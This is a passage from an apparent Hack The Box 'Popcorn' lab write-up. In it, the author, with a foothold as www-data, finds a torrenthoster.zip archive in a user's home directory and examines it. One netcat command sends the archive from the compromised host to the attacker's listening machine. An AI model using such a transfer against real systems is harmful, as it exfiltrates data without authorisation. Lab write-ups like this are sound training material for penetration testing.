torrenthoster.zip
After performing some basic enumeration, I found out that there is what appears to be a backup archive of the web server sitting at the home directory of the george
user
www-data@popcorn:/home/george$ ll
total 868K
4.0k -rw-r--r-- 1 george george 33 feb 2 10:57 user.txt
4.0K drwxr-xr-x 3 george george 4.0K Oct 26 2020 .
0 lrwxrwxrwx 1 george george 9 Oct 26 2020 .bash_history -> /dev/null
4.0K -rw------- 1 root root 19 May 5 2017 .nano_history
4.0K -rw------- 1 root root 1.6K Mar 17 2017 .mysql_history
0 -rw-r--r-- 1 george george 0 Mar 17 2017 .sudo_as_admin_successful
4.0K drwxr-xr-x 2 george george 4.0K Mar 17 2017 .cache
832K -rw-r--r-- 1 george george 829K Mar 17 2017 torrenthoster.zip
4.0K -rw-r--r-- 1 george george 220 Mar 17 2017 .bash_logout
4.0K -rw-r--r-- 1 george george 3.2K Mar 17 2017 .bashrc
4.0K -rw-r--r-- 1 george george 675 Mar 17 2017 .profile
4.0K drwxr-xr-x 3 root root 4.0K Mar 17 2017 ..
www-data@popcorn:/home/george$ nc 10.10.14.5 2222 < torrenthoster.zip
┌──(kali㉿kali)-[~/archive/htb/labs/popcorn]
└─$ nnc 2222 > torrenthoster.zip
listening on [any] 2222 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.6] 35298
Transferring the archive to Kali for further examination
┌──(kali㉿kali)-[~/…/popcorn/torrenthoster/torrenthoster/torrenthoster]
└─$ ll
total 168K
4.0K drwxr-xr-x 2 kali kali 4.0K Jan 31 2010 health
4.0K drwxr-xr-x 2 kali kali 4.0K Jan 31 2010 images
4.0K drwxr-xr-x 2 kali kali 4.0K Jan 31 2010 upload
4.0K drwxr-xr-x 2 kali kali 4.0K Jan 31 2010 PNG
4.0K drwxr-xr-x 3 kali kali 4.0K Jan 31 2010 users
4.0K drwxr-xr-x 15 kali kali 4.0K Jan 31 2010 .
4.0K drwxr-xr-x 3 kali kali 4.0K Jan 31 2010 ..
4.0K drwxr-xr-x 3 kali kali 4.0K Jun 3 2007 templates
8.0K -rw-r--r-- 1 kali kali 6.5K Jun 3 2007 config.php
4.0K drwxr-xr-x 4 kali kali 4.0K Jun 3 2007 admin
4.0K drwxr-xr-x 2 kali kali 4.0K Jun 3 2007 css
4.0K drwxr-xr-x 2 kali kali 4.0K Jun 3 2007 database
4.0K drwxr-xr-x 2 kali kali 4.0K Jun 3 2007 js
4.0K drwxr-xr-x 2 kali kali 4.0K Jun 3 2007 lib
4.0K drwxr-xr-x 2 kali kali 4.0K Jun 3 2007 readme
4.0K drwxr-xr-x 2 kali kali 4.0K Jun 3 2007 torrents
4.0K -rw-r--r-- 1 kali kali 3.0K Jun 3 2007 comment.php
4.0K -rw-r--r-- 1 kali kali 1.5K Jun 3 2007 upload_file.php
8.0K -rw-r--r-- 1 kali kali 7.1K Jun 3 2007 torrents.php
4.0K -rw-r--r-- 1 kali kali 1.6K Jun 3 2007 index.php
4.0K -rw-r--r-- 1 kali kali 1.6K Jun 3 2007 edit.php
16K -rw-r--r-- 1 kali kali 15K Jun 3 2007 upload.php
4.0K -rw-r--r-- 1 kali kali 986 Jun 3 2007 update_stats2.php
4.0K -rw-r--r-- 1 kali kali 1.7K Jun 1 2007 browse.php
4.0K -rw-r--r-- 1 kali kali 125 Jan 20 2007 download.php
4.0K -rw-r--r-- 1 kali kali 1.8K Jan 9 2007 login.php
8.0K -rw-r--r-- 1 kali kali 4.1K Dec 28 2006 thumbnail.php
4.0K -rw-r--r-- 1 kali kali 329 Dec 28 2006 logout.php
4.0K -rw-r--r-- 1 kali kali 539 Nov 30 2006 update_stats.php
4.0K -rw-r--r-- 1 kali kali 573 Nov 29 2006 secure.php
4.0K -rw-r--r-- 1 kali kali 321 Nov 28 2006 stylesheet.css
4.0K -rw-r--r-- 1 kali kali 3.3K Jun 10 2005 rss.php
4.0K -rw-r--r-- 1 kali kali 3.5K Mar 6 2005 validator.php
4.0K -rw-r--r-- 1 kali kali 3.7K Mar 6 2005 hide.js
8.0K -rw-r--r-- 1 kali kali 6.2K Mar 6 2005 sorttable.js
It doesn’t seem like a backup of the webserver. This looks more like the installation itself.
All the configurations that I saw at the /var/www/torrent
directory are gone.